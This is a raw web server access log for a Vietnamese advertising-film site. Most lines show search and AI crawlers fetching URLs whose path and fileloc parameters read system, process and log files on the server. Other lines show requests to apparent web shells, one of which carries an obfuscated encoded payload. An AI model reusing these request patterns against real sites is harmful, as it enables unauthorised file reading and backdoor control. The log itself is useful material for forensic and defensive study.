216.73.216.50 - - [10/Nov/2025:00:00:29 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsys%2Fclass%2Fblock%2Fsda%2Fsda15%2Fsubsystem%2Floop6%2Fsubsystem%2Floop6%2Fqueue%2Foptimal_io_size&path=%2F%2Fsys%2Fclass%2Fblock%2Fsda%2Fsda15%2Fsubsystem%2Floop6%2Fsubsystem%2Floop6%2Fqueue HTTP/1.1" 200 2683 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [10/Nov/2025:00:00:29 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fthread-self%2Froot%2Fusr%2Fshare%2Fdoc%2Fbcache-tools HTTP/1.1" 200 3113 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [10/Nov/2025:00:00:29 +0000] "GET /demo-page?path=%2F HTTP/1.1" 200 3566 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [10/Nov/2025:00:00:29 +0000] "GET /our-works/tv-commercial/tvc-tet-sum-vay?path=%2F%2Fproc%2Fthread-self%2Froot%2Fusr%2Flib%2Fmodules%2F5.4.0-216-generic%2Fbuild%2Ffs%2Fpstore HTTP/1.1" 200 3069 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [10/Nov/2025:00:00:30 +0000] "GET /our-works/url%20=%3Cwidth%3Ex%3Cheight%3E%20%22optional%20title%22?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fradix_tree_node%2Fmin_partial&path=%2F%2Fsys%2Fkernel%2Fslab%2Fradix_tree_node HTTP/1.1" 200 2638 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [10/Nov/2025:00:00:30 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory12/subsystem/devices/memory13/subsystem/devices/memory5/power HTTP/1.1" 200 3402 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
34.236.135.14 - - [10/Nov/2025:00:00:30 +0000] "GET /our-works/tvc-jokky/?fileloc=//lib/systemd/user/graphical-session-pre.target&path=//lib/systemd/user HTTP/1.1" 200 2950 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.50 - - [10/Nov/2025:00:00:31 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsys%2Fdevices%2Fvirtual%2Fblock%2Floop0%2Fsubsystem%2Floop3%2Fqueue%2Foptimal_io_size&path=%2F%2Fsys%2Fdevices%2Fvirtual%2Fblock%2Floop0%2Fsubsystem%2Floop3%2Fqueue HTTP/1.1" 200 2678 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [10/Nov/2025:00:00:31 +0000] "GET /65lzd435.html?path=//usr HTTP/1.1" 200 3246 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [10/Nov/2025:00:00:36 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory12/subsystem/devices/memory13/subsystem/devices/memory8/power HTTP/1.1" 200 3402 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
50.16.248.61 - - [10/Nov/2025:00:00:37 +0000] "GET /our-works/tv-commercial/tvc-thach-long-hai/?path=//var/run/udev/rules.d HTTP/1.1" 200 2964 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.50 - - [10/Nov/2025:00:00:37 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsys%2Fclass%2Fleds%2Finput1%3A%3Ascrolllock%2Fsubsystem%2Finput1%3A%3Anumlock%2Fdevice%2Fdevice%2Fsoftrepeat&path=%2F%2Fsys%2Fclass%2Fleds%2Finput1%3A%3Ascrolllock%2Fsubsystem%2Finput1%3A%3Anumlock%2Fdevice%2Fdevice HTTP/1.1" 200 2674 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [10/Nov/2025:00:00:38 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fsys%2Fclass%2Finput%2Finput3%2Fsubsystem%2Finput3%2Fsubsystem%2Fevent1%2Fdevice%2Fsubsystem%2Finput3%2Fsubsystem%2Fevent0 HTTP/1.1" 200 3190 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [10/Nov/2025:00:00:38 +0000] "GET /9coa4509.html?path=//run HTTP/1.1" 200 4752 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [10/Nov/2025:00:00:39 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsys%2Fclass%2Finput%2Finput0%2Fdevice%2Fsubsystem%2Fdevices%2FLNXSYSTM%3A00%2Fpower%2Fruntime_suspended_time&path=%2F%2Fsys%2Fclass%2Finput%2Finput0%2Fdevice%2Fsubsystem%2Fdevices%2FLNXSYSTM%3A00%2Fpower HTTP/1.1" 200 2698 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [10/Nov/2025:00:00:39 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fsys%2Fclass%2Finput%2Fmouse1%2Fsubsystem%2Fevent1%2Fdevice%2Fsubsystem%2Finput3%2Fdevice%2Fhidraw HTTP/1.1" 200 2996 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [10/Nov/2025:00:00:40 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsys%2Fclass%2Fwakeup%2Fwakeup2%2Fdevice%2Fphysical_node%2Ffirmware_node%2Fsubsystem%2Fdevices%2Fdevice%3A1e%2Fadr&path=%2F%2Fsys%2Fclass%2Fwakeup%2Fwakeup2%2Fdevice%2Fphysical_node%2Ffirmware_node%2Fsubsystem%2Fdevices%2Fdevice%3A1e HTTP/1.1" 200 2704 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [10/Nov/2025:00:00:40 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fthread-self%2Froot%2Fusr%2Fshare%2Flocale%2Fshn%2FLC_MESSAGES%2Fxdg-user-dirs.mo&path=%2F%2Fproc%2Fthread-self%2Froot%2Fusr%2Fshare%2Flocale%2Fshn%2FLC_MESSAGES HTTP/1.1" 200 2685 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [10/Nov/2025:00:00:41 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fsys%2Fbus%2Fpci%2Fdrivers%2Fvirtio-pci%2F0000%3A00%3A03.0%2Fsubsystem%2Fdevices%2F0000%3A00%3A01.1%2Ffirmware_node%2Fpower HTTP/1.1" 200 3367 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
204.12.208.18 - - [10/Nov/2025:00:00:42 +0000] "GET /wp-includes/addc3d4c/edit.php HTTP/1.1" 499 0 "https://lamphimquangcao.net/wp-includes/addc3d4c/edit.php" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2"
54.235.158.162 - - [10/Nov/2025:00:00:45 +0000] "GET /our-works/tvc-bia-hello/?path=//usr/share/fonts/truetype HTTP/1.1" 200 2934 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [10/Nov/2025:00:00:45 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory12/subsystem/devices/memory13/subsystem/devices/memory4/power HTTP/1.1" 200 3402 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [10/Nov/2025:00:00:46 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fsys%2Fclass%2Finput%2Finput3%2Fsubsystem%2Finput3%2Fsubsystem%2Fevent1%2Fdevice%2Fsubsystem%2Finput3%2Fsubsystem%2Fmouse2 HTTP/1.1" 200 3196 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [10/Nov/2025:00:00:46 +0000] "GET /our-works/url%20=%3Cwidth%3Ex%3Cheight%3E%20%22optional%20title%22?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2FUNIX%2Fcgroup%2FUNIX%2889%3Adev-hugepages.mount%29%2Fobjects_partial&path=%2F%2Fsys%2Fkernel%2Fslab%2FUNIX%2Fcgroup%2FUNIX%2889%3Adev-hugepages.mount%29 HTTP/1.1" 200 2673 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [10/Nov/2025:00:00:47 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fthread-self%2Froot%2Fusr%2Fshare%2Fcommon-licenses%2FGPL-2&path=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fthread-self%2Froot%2Fusr%2Fshare%2Fcommon-licenses HTTP/1.1" 200 9563 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [10/Nov/2025:00:00:47 +0000] "GET /62opi102.html?path=//run HTTP/1.1" 200 4752 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [10/Nov/2025:00:00:48 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsys%2Fclass%2Finput%2Finput0%2Fdevice%2Fsubsystem%2Fdevices%2FLNXSYSTM%3A00%2Fpower%2Fcontrol&path=%2F%2Fsys%2Fclass%2Finput%2Finput0%2Fdevice%2Fsubsystem%2Fdevices%2FLNXSYSTM%3A00%2Fpower HTTP/1.1" 200 2689 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.248.20 - - [10/Nov/2025:00:00:50 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323733363333302p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323733323733302q3766643434356337336537343233643763626236386130326666646535633839222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 504 167 "-" "-"
216.73.216.50 - - [10/Nov/2025:00:00:50 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsys%2Fclass%2Fblock%2Fsda1%2Fsubsystem%2Fsda%2Fqueue%2Fmax_sectors_kb&path=%2F%2Fsys%2Fclass%2Fblock%2Fsda1%2Fsubsystem%2Fsda%2Fqueue HTTP/1.1" 499 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
44.212.145.46 - - [10/Nov/2025:00:00:50 +0000] "GET /our-works/tvc-bia-hello/?path=//usr/share/fonts/truetype HTTP/1.1" 499 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
204.12.208.18 - - [10/Nov/2025:00:00:51 +0000] "GET /wp-includes/addc3d4c/edit.php HTTP/1.1" 200 6 "https://lamphimquangcao.net/wp-includes/addc3d4c/edit.php" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MAGW; .NET4.0C; Lunascape 6.5.8.24780)"
98.83.177.42 - - [10/Nov/2025:00:00:53 +0000] "GET /our-works/tvc-kimino/?path=//lib/python3.8/importlib/__pycache__ HTTP/1.1" 200 3309 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [10/Nov/2025:00:00:54 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory12/subsystem/devices/memory13/subsystem/devices/memory6 HTTP/1.1" 200 3419 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [10/Nov/2025:00:00:55 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsys%2Fdev%2Fblock%2F8%3A0%2Fdevice%2Fblock%2Fsda%2Fsda15%2Fsubsystem%2Floop2%2Frange&path=%2F%2Fsys%2Fdev%2Fblock%2F8%3A0%2Fdevice%2Fblock%2Fsda%2Fsda15%2Fsubsystem%2Floop2 HTTP/1.1" 200 2683 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
23.21.228.180 - - [10/Nov/2025:00:00:56 +0000] "GET /our-works/tvc-sjc/?path=//proc/24/attr HTTP/1.1" 200 3249 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
66.249.71.1 - - [10/Nov/2025:00:00:56 +0000] "GET /?products=1124351408 HTTP/1.1" 200 23189 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.50 - - [10/Nov/2025:00:00:57 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fsys%2Fclass%2Finput%2Finput3%2Fsubsystem%2Finput3%2Fsubsystem%2Fevent1%2Fdevice%2Fsubsystem%2Finput3%2Fsubsystem%2Fevent4 HTTP/1.1" 200 3190 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [10/Nov/2025:00:00:57 +0000] "GET /4jjw1924.html?path=//bin HTTP/1.1" 200 34676 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
18.215.112.101 - - [10/Nov/2025:00:00:58 +0000] "GET /our-works/tvc-jokky/?path=//usr/share/doc/multipath-tools HTTP/1.1" 200 3146 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [10/Nov/2025:00:01:02 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory12/subsystem/devices/memory11/subsystem/drivers HTTP/1.1" 200 2759 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
34.202.88.37 - - [10/Nov/2025:00:01:03 +0000] "GET /our-works/tvc-sjc/?path=//sys/module/scsi_dh_rdac HTTP/1.1" 200 3342 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.50 - - [10/Nov/2025:00:01:03 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fsys%2Fclass%2Finput%2Fmouse1%2Fsubsystem%2Fevent2%2Fsubsystem%2Finput1%2Finput1%3A%3Anumlock%2Fdevice%2Fdevice HTTP/1.1" 200 3742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [10/Nov/2025:00:01:05 +0000] "GET /21awap4395.html?fileloc=/var/www/lamphim/data/logs/lamphimquangcao.net-backend.error.log.9.gz&path=/var/www/lamphim/data/logs HTTP/1.1" 200 2665 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
52.202.233.37 - - [10/Nov/2025:00:01:05 +0000] "GET /our-works/tvc-bia-hello/?path=//sys/dev/char/4:8 HTTP/1.1" 200 3089 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
3.211.181.86 - - [10/Nov/2025:00:01:09 +0000] "GET /our-works/tvc-relax-gaba/?path=//sys/module/watchdog/parameters HTTP/1.1" 200 3013 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.50 - - [10/Nov/2025:00:01:09 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fsys%2Fclass%2Finput%2Fevent2%2Fsubsystem%2Fmouse1%2Fsubsystem%2Finput1%2Finput1%3A%3Anumlock%2Fdevice%2Fdevice HTTP/1.1" 200 3742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [10/Nov/2025:00:01:10 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory12/subsystem/devices/memory13/subsystem/devices/memory7/power HTTP/1.1" 200 3401 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:01:10 +0000] "GET /239gxluy3797.html?path=/var/www HTTP/1.1" 200 3731 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
44.217.255.167 - - [10/Nov/2025:00:01:12 +0000] "GET /our-works/tvc-relax-gaba/?path=//sys/module/watchdog/parameters HTTP/1.1" 200 3013 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.50 - - [10/Nov/2025:00:01:12 +0000] "GET /our-works/tv-commercial/tvc-tet-sum-vay?fileloc=%2F%2Fproc%2Fthread-self%2Froot%2Fusr%2Fshare%2Fdoc%2Fopenssh-server%2FOVERVIEW.gz&path=%2F%2Fproc%2Fthread-self%2Froot%2Fusr%2Fshare%2Fdoc%2Fopenssh-server HTTP/1.1" 200 2672 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [10/Nov/2025:00:01:13 +0000] "GET /19onr5963.html?path=//tmp HTTP/1.1" 200 2939 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [10/Nov/2025:00:01:13 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory12/subsystem/devices/memory13/subsystem/devices/memory0/power HTTP/1.1" 200 3403 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.79.248.20 - - [10/Nov/2025:00:01:14 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323733363335342p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323733323735342q3962336233396437643834353533623333353962386561653163646261356433222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 504 167 "-" "-"
34.205.163.103 - - [10/Nov/2025:00:01:14 +0000] "GET /our-works/tvc-calci/?path=//lib/python3.8/ctypes/__pycache__ HTTP/1.1" 200 3159 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.50 - - [10/Nov/2025:00:01:15 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsys%2Fclass%2Fmisc%2Fvfio%2Fsubsystem%2Fbtrfs-control%2Fsubsystem%2Fuinput%2Fpower%2Fruntime_active_kids&path=%2F%2Fsys%2Fclass%2Fmisc%2Fvfio%2Fsubsystem%2Fbtrfs-control%2Fsubsystem%2Fuinput%2Fpower HTTP/1.1" 200 2691 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [10/Nov/2025:00:01:16 +0000] "GET /28ydj542.html?path=//lib HTTP/1.1" 200 6162 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [10/Nov/2025:00:01:16 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory12/subsystem/devices/memory11/subsystem/devices HTTP/1.1" 200 3437 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [10/Nov/2025:00:01:16 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsys%2Fbus%2Fpci%2Fdrivers%2Fvirtio-pci%2F0000%3A00%3A03.0%2Fsubsystem%2Fdevices%2F0000%3A00%3A01.1%2Ffirmware_node%2Fuevent&path=%2F%2Fsys%2Fbus%2Fpci%2Fdrivers%2Fvirtio-pci%2F0000%3A00%3A03.0%2Fsubsystem%2Fdevices%2F0000%3A00%3A01.1%2Ffirmware_node HTTP/1.1" 200 2705 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [10/Nov/2025:00:01:17 +0000] "GET /59wkd951.html?fileloc=//bin/telnet.netkit&path=//bin HTTP/1.1" 200 2600 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [10/Nov/2025:00:01:18 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory10/subsystem/devices/memory4/subsystem/devices/memory10/power HTTP/1.1" 200 3400 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
52.71.46.142 - - [10/Nov/2025:00:01:18 +0000] "GET /our-works/phim-viral-ila/?path=//run/systemd/generator HTTP/1.1" 200 3251 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [10/Nov/2025:00:01:18 +0000] "GET /59wkd951.html?fileloc=//bin/kbd_mode&path=//bin HTTP/1.1" 200 2597 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [10/Nov/2025:00:01:19 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsys%2Fclass%2Fblock%2Fsda14%2Fsubsystem%2Fsda%2Fsda1%2Fsubsystem%2Floop3%2Fsubsystem%2Floop6%2Falignment_offset&path=%2F%2Fsys%2Fclass%2Fblock%2Fsda14%2Fsubsystem%2Fsda%2Fsda1%2Fsubsystem%2Floop3%2Fsubsystem%2Floop6 HTTP/1.1" 200 2688 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [10/Nov/2025:00:01:19 +0000] "GET /59wkd951.html?fileloc=//bin/pod2text&path=//bin HTTP/1.1" 200 7120 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:01:21 +0000] "GET /173wqngz7343.html?path=/var/www/chatbot HTTP/1.1" 200 2666 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
114.119.132.10 - - [10/Nov/2025:00:01:21 +0000] "GET /?products=904524 HTTP/1.1" 200 4543 "https://lamphimquangcao.net/?sitemap201.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
40.77.167.30 - - [10/Nov/2025:00:01:21 +0000] "GET /?products=342378986 HTTP/1.1" 200 25325 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
52.204.81.148 - - [10/Nov/2025:00:01:22 +0000] "GET /video/san-xuat-phim-quang-cao/?path=//opt/fphp/var HTTP/1.1" 200 2958 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [10/Nov/2025:00:01:24 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory12/subsystem/devices/memory13/subsystem/devices/memory3 HTTP/1.1" 200 3417 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [10/Nov/2025:00:01:24 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fusr%2Fshare%2Fzoneinfo-icu%2F44%2Fbe HTTP/1.1" 200 3112 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [10/Nov/2025:00:01:25 +0000] "GET /74ijtph34816.html?path=/var/www HTTP/1.1" 200 3731 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
98.84.184.80 - - [10/Nov/2025:00:01:27 +0000] "GET /our-works/tvc-sjc/?path=//run/log/journal HTTP/1.1" 200 2668 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [10/Nov/2025:00:01:28 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory10/subsystem/devices/memory4/node0/subsystem/drivers HTTP/1.1" 200 2766 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
